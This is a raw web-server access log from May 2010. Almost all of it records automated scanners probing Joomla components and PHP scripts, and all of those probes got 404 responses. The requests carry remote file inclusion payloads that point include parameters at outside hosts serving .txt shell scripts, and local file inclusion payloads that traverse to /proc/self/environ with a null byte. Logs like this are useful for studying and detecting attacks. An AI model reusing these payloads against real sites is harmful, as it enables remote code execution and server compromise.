213.128.84.14 - - [30/May/2010:06:08:01 -0500] "GET /common/language/adminhead.php?languagefile=http://agehq.com/forum/sc1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:06:08:01 -0500] "GET /logs/common/language/adminhead.php?languagefile=http://agehq.com/forum/sc1? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:06:08:01 -0500] "GET /logs/access_log.1273017600%20%20/common/language/adminhead.php?languagefile=http://agehq.com/forum/sc1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:06:08:03 -0500] "GET /common/language/adminhead.php?languagefile=http://agehq.com/forum/sc1? HTTP/1.1" 404 313 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:06:08:03 -0500] "GET /logs/common/language/adminhead.php?languagefile=http://agehq.com/forum/sc1? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.128.84.14 - - [30/May/2010:06:08:03 -0500] "GET /logs/access_log.1273017600%20%20/common/language/adminhead.php?languagefile=http://agehq.com/forum/sc1? HTTP/1.1" 404 342 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:06:09:52 -0500] "GET /videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:06:09:55 -0500] "GET /logs/access_log.1238803200%20%20/videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 334 "-""Mozilla/5.0"
200.61.185.200 - - [30/May/2010:06:09:56 -0500] "GET /logs/videodb.class.xml.php?mosConfig_absolute_path=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:11:12 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:11:12 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:11:12 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:11:23 -0500] "GET /logs/index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:11:23 -0500] "GET /index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:11:23 -0500] "GET /logs/access_log.1272412800/index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:11:29 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:11:52 -0500] "GET /index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:11:53 -0500] "GET /logs/access_log.1272412800/index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:11:53 -0500] "GET /logs/index.php?option=com_jeformcr&view=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:12:12 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:12:12 -0500] "GET /logs/access_log.1271462400/index.php?option=com_dwgraphs&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:12:12 -0500] "GET /index.php?option=com_dwgraphs&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:12:13 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:12:13 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:12:13 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:12:20 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:14:42 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:14:42 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:14:42 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 341 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:14:42 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:14:42 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:14:42 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:15:02 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:15:03 -0500] "GET /logs/access_log.1273363200%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:15:16 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:15:16 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:15:16 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
208.115.111.248 - - [30/May/2010:06:15:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
88.191.94.188 - - [30/May/2010:06:16:44 -0500] "GET /logs/access_log.1274313600%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:16:45 -0500] "GET /logs/access_log.1274313600%20%20/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 365 "-""Mozilla/5.0"
72.32.2.216 - - [30/May/2010:06:17:22 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.2.216 - - [30/May/2010:06:17:22 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.2.216 - - [30/May/2010:06:17:22 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.46.204.237 - - [30/May/2010:06:17:27 -0500] "GET /logs/access_log.1199836800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
193.126.206.28 - - [30/May/2010:06:17:45 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:17:45 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:17:45 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:17:58 -0500] "GET /logs/access_log.1272499200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:17:58 -0500] "GET /logs/access_log.1270857600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:17:59 -0500] "GET /logs/access_log.1270857600/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
88.191.94.188 - - [30/May/2010:06:17:59 -0500] "GET /logs/access_log.1272499200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.howtolisten.kr/lct/exam3/81/auto1.txt????? HTTP/1.1" 404 363 "-""Mozilla/5.0"
72.32.2.216 - - [30/May/2010:06:18:12 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.2.216 - - [30/May/2010:06:18:12 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
72.32.2.216 - - [30/May/2010:06:18:12 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
66.135.61.13 - - [30/May/2010:06:20:29 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:20:51 -0500] "GET /logs/access_log.1270598400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:20:51 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:20:51 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:20:52 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:20:52 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:20:52 -0500] "GET /logs/access_log.1270598400///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:21:00 -0500] "GET /logs/access_log.1271548800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:21:01 -0500] "GET /logs/access_log.1271548800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:21:32 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:21:32 -0500] "GET /logs/access_log.1271462400/index.php?option=com_dwgraphs&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:21:32 -0500] "GET /index.php?option=com_dwgraphs&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.7.108.203 - - [30/May/2010:06:21:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [30/May/2010:06:21:37 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [30/May/2010:06:21:37 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
193.126.206.28 - - [30/May/2010:06:21:47 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:21:47 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:22:28 -0500] "GET /logs/access_log.1273017600%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:22:29 -0500] "GET /logs/access_log.1270598400//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:22:29 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:23:13 -0500] "GET /logs/access_log.1273017600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
193.126.206.28 - - [30/May/2010:06:24:11 -0500] "GET /logs/access_log.1273017600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.52.108.59 - - [30/May/2010:06:24:56 -0500] "GET /logs/access_log.1163462400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.149.84.14 - - [30/May/2010:06:25:42 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:25:42 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:25:42 -0500] "GET /logs/access_log.1271548800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:26:06 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 341 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:26:06 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:26:06 -0500] "GET /logs/access_log.1271548800///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:26:41 -0500] "GET /logs/access_log.1271721600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:26:45 -0500] "GET /logs/access_log.1270771200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:26:47 -0500] "GET /index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:26:47 -0500] "GET /logs/index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:26:50 -0500] "GET /logs/access_log.1271808000/index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:27:02 -0500] "GET /logs/access_log.1271721600///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
218.149.84.14 - - [30/May/2010:06:27:06 -0500] "GET /logs/access_log.1270771200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.leehongsun.com//id1.txt? HTTP/1.1" 404 363 "-""Mozilla/5.0"
174.142.68.135 - - [30/May/2010:06:28:03 -0500] "GET /logs//index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
174.142.68.135 - - [30/May/2010:06:28:03 -0500] "GET //index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:06:29:20 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:06:29:21 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:06:29:21 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
89.107.213.98 - - [30/May/2010:06:29:59 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
195.10.195.144 - - [30/May/2010:06:30:21 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
195.10.195.144 - - [30/May/2010:06:30:21 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
208.100.59.16 - - [30/May/2010:06:30:24 -0500] "GET /logs/index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:30:24 -0500] "GET /index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:30:29 -0500] "GET /logs/access_log.1271808000/index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:30:31 -0500] "GET /logs/access_log.1273017600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
207.46.204.188 - - [30/May/2010:06:31:27 -0500] "GET /logs/access_log.1161561600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.59.6.16 - - [30/May/2010:06:31:34 -0500] "GET /logs/index.php?option=com_econtent&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:31:34 -0500] "GET /index.php?option=com_econtent&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
212.59.6.16 - - [30/May/2010:06:31:34 -0500] "GET /logs/access_log.1271462400/index.php?option=com_econtent&controller=http://mb-searchandrescue.com/Ckrid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.135.61.13 - - [30/May/2010:06:32:04 -0500] "GET /logs/access_log.1273017600//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.boomong.com//bbs/data/idxx.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:32:50 -0500] "GET /index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:32:50 -0500] "GET /logs/access_log.1271808000/index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
208.100.59.16 - - [30/May/2010:06:32:50 -0500] "GET /logs/index.php?option=http://innovativecommunitysolution.com//templates/system/1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
